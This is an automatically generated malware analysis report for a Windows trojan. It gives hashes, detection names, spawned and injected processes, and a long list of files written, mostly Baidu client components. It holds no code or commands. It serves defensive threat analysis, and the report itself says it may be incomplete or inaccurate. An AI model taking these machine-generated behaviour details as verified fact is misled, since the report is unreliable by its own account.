Trojan.GenericKD.2738847_62a1f81b78 – Adaware

HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.GenericKD.2738847 (B) (Emsisoft), Trojan.GenericKD.2738847 (AdAware), Backdoor.Win32.Farfli.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan, Backdoor, Worm, EmailWorm

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 62a1f81b780ab024f29557dc3edaf507

SHA1: 788df2f13be40f4974a057586e1a4b828e951803

SHA256: 410a6f657e24ffdfa6d865ae3e765df679ffaff08471ff4c6af9f3f8528fbfc2

SSDeep: 12288:19gU8PQUbEPCKw4SFJtLc7GQfVbxriwzh:1mU8PcPJwny7hx7zh

Size: 568144 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company:

Created at: 2015-09-19 15:25:16

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.

Process activity

The Trojan creates the following process(es):

Baidu_Setup_1.6.200.359_ftn_1050103060.exe:1216
Kuaizip_Setup_7654_1061607.exe:828
YouQian_Setup.exe:1312
KuaiZip.exe:4052
Update.exe:3744
Baidu.exe:656
Baidu.exe:2568
Baidu.exe:1412
Baidu.exe:3816
KZMount.exe:3708
KZMount.exe:3484
regsvr32.exe:1652
regsvr32.exe:512
regsvr32.exe:3776
BaiduUpdate.exe:3784

The Trojan injects its code into the following process(es):

Baidu_Setup_1.6.200.359_ftn_1050103060.exe:1272
Baidu.exe:1988
%original file name%.exe:1612

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process Baidu_Setup_1.6.200.359_ftn_1050103060.exe:1272 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages_x.png (89 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-checkbox-unchecked.png (361 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\349.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Base.dll (77808 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\Software.pb (9984 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\res_xiaoxizhongxin.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\iconall-1.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\arrow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo_blank.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\haze.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\executor.xml (233 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\connection-error.html (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\login\login.html (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\png8-logo57x65.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\executor.xml (187 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Update.dll (11040 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-center-left.png (130 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\PluginSetup.xml (654 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\storm.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\msgconfig.pb (142 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\icon_xinwen.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-center-right.png (130 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\foggy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\login_mods.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\InstallHelper.dll (3616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\sleet.png (741 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\enter.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\skinres.rdb (8 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\pack.bat (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\weixinUI.xml (345 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\request.js (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-storm.png (926 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\download-hover.png (985 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\app-error.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\uninst.exe (18640 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\bookmarks_z.png (7 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\light-rain.png (864 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\LocalPluginInfo.xml (4 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\executor.xml (310 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\icon_gupiao.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sandstorm.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\PluginSetup.xml (625 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo57x65.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\crash.html (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\skinres.rdb (8 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\PluginSetup.xml (612 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\overcast.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\shower.png (817 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\icon_yinyue.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.woff (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-google.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\mod.js (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\foggy.png (663 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\appBlackList.dat (8 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\split_m.png (124 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\kuaidi.png (312 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\res_jietu.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\dust.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\res_weixin.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\default-icon.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\dy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Protocol.dll (24048 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\msvcr100.dll (51648 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\executor.xml (172 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\advance.png (377 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\44.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\green_arrow_up.png (154 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\icon_bianqian.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\PluginSetup.xml (612 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\344.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\respond.min.js (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\split_m.png (925 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduBugRpt.exe (13168 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\icon-circle-loading.gif (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\Report.dll (3616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder.png (276 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\404.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\vedio_play.png (465 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\res_yinyue.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\main.js (1552 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\jietuDll.dll (3312 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\AssociateWnd.rdb (1568 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\UIHandler.dll (120372 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-loading.gif (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\banner.png (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\thundershower.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\gupiaoUI.xml (336 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-unchecked.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-search-large.png (408 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\history_mods.js (6360 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\thundershower-with-hail.png (946 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\png8-ala.png (561 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\jietuUI.xml (347 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\Update.rdb (6624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\layout.css (11 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\severe-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\settings_mods.js (2392 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\DD_belatedPNG_0.0.8a-min.js (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-left.png (194 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\bianqianUI.xml (346 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\pack_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-search.png (382 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\qq.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\moderate-rain.png (963 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\executor.xml (241 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\screensnapshot.exe (20624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\shower.png (481 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\super-ajax.js (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\snow-storm.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\res\InstallWnd.zip (3616 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\loading.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\xinwenUI.xml (342 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\XiaoXiUI.xml (382 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\box-shadow.css (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\res_resou.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-close.png (170 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\366.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\snow-flurry.png (479 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\PluginMgr.dll (49664 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LogicMisc.dll (140990 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\server-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-textbox.png (588 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\msvcp100.dll (28368 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\icon-alert-ok.png (2392 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\dy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\png8-ex.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\aladdin.html (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\auto_complete\top_site.db (10128 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-searchbox-active.png (893 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\history.css (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-left.png (249 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\map.js (8 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\executor.xml (150 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\login-success.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\yinyueUI.xml (358 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\png8-iconall-1.png (197 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\gz.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery-ui-1.10.4.custom.min.js (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\res\js\common.js (990 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\login.css (7 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\res_xinwen.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\1px.png (947 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\resouUI.xml (340 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\music_play.png (155 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sunny.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\PluginSetup.xml (622 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\settings.css (2392 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-right.png (259 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-center.png (143 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-clear-general-png8.png (841 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\res_bianqian.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\skinres.rdb (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\new.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery-1.11.1.min.js (3312 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\gray1px.png (918 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\download-hover.png (177 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\iconall.gif (94 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\json2.js (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\privacy.png (296 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\ice-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\PWidgetAppCommonBase.dll (14384 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\rpt.dat (120 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\login_z.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\MsgPush.dll (31072 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\iframe_loading.gif (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\input.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\favicon.ico (5 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\testIO.exe (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\Setting.rdb (3712 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\snow-storm.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\icon_jietu.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq5.tmp (447624 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\executor.xml (234 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\BDSearchBar.rdb (6624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\bookmarks.html (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\global.js (8184 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-checkbox-checked.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-newtab.png (197 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\1.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\icon_xiaoxizhongxinNotify.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\general.png (379 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\green_arrow_down.png (150 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\cloudy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\history_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\light-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-taobao.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\input.png (214 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\XiaoXiUINotify.xml (412 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\unknown.png (480 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\vedio_play.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.eot (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-right.png (202 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\arrow-png8.png (260 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Utils.dll (46592 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder-arrow-png8.png (292 bytes)
